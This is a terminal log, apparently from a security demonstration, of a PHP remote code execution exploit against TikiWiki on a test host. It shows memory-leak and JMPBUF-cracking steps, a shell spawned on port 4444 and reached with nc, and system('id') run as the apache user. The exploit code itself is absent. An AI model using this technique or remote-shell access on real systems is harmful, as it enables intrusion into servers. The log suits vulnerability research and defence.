$ ./exploit.py -h http://t.testsystem/
PHP xxx() Remote Code Execution Exploit (TikiWiki Version)
Copyright (C) 2010 Stefan Esser/SektionEins GmbH
*** DO NOT DISTRIBUTE ***
[+] Connecting to determine wordsize
[+] Wordsize is 32 bit
[+] Connecting to determine PHP 5.2.x vs. PHP 5.3.x
[+] PHP version is 5.3.x
[+] Connecting to determine XXX version
[+] PHP version >= 5.3.2
[+] Determining endianess of system
[+] System is little endian
[+] Leaking address of std_object_handlers
[+] Found std_object_handlers address to be 0xb76e84a0
[+] Leaking std_object_handlers
[+] Retrieved std_object_handlers (0xb75b5c60, 0xb75b6230, 0xb75b2300, 0xb75b4c70, 0xb75b52f0, 0xb75b3fc0, 0xb75b42b0, 0xb75b4430, 0x00000000, 0x00000000, 0xb75b3c60, 0xb75b4a40, 0xb75b57a0, 0xb75b4170, 0xb75b27d0, 0xb75b4f00, 0x00000000, 0xb75b28a0, 0xb75b27a0, 0xb75b2af0, 0xb75b2830, 0xb75b46b0, 0x00000000, 0x00000000, 0xb75b2be0)
[+] Optimized to 0xb74008f0
[+] Scanning for executable header
[+] ELF header found at 0xb73ab000
[+] Retrieving and parsing ELF header
[+] Retrieving program headers
[+] Retrieving ELF string table
[+] Looking up ELF symbol: executor_globals
[+] Found executor_globals at 0xb76fe280
[+] Looking up ELF symbol: php_execute_script
[+] Found php_execute_script at 0xb75386c0
[+] Looking up ELF symbol: zend_eval_string
[+] Found zend_eval_string at 0xb7586580
[+] Searching JMPBUF in executor_globals
[+] Found JMPBUF at 0xbfcc64b4
[+] Attempt to crack JMPBUF
[+] Determined stored EIP value 0xb753875a from pattern match
[+] Calculated XORER 0x68ab06ea
[+] Unmangled stored ESP is 0xbfcc5470
[+] Checking memory infront of JMPBUF for overwriting possibilities
[+] Found 0x28 at 0xbfcc6498 (0x3e4) using it as overwrite trampoline
[+] Returning into PHP...
Spawning a shell at port 4444 ...

$ nc t.testsystem 4444
Welcome to the PHPShell 5/22/2010 1:27 am
system("uname -a");
Linux fedora13x86 2.6.33.4-95.fc13.i686.PAE #1 SMP Thu May 13 05:38:26 UTC 2010 i686 i686 i386 GNU/Linux
system("id");
uid=48(apache) gid=484(apache) groups=484(apache) context=unconfined_u:system_r:httpd_t:s0
...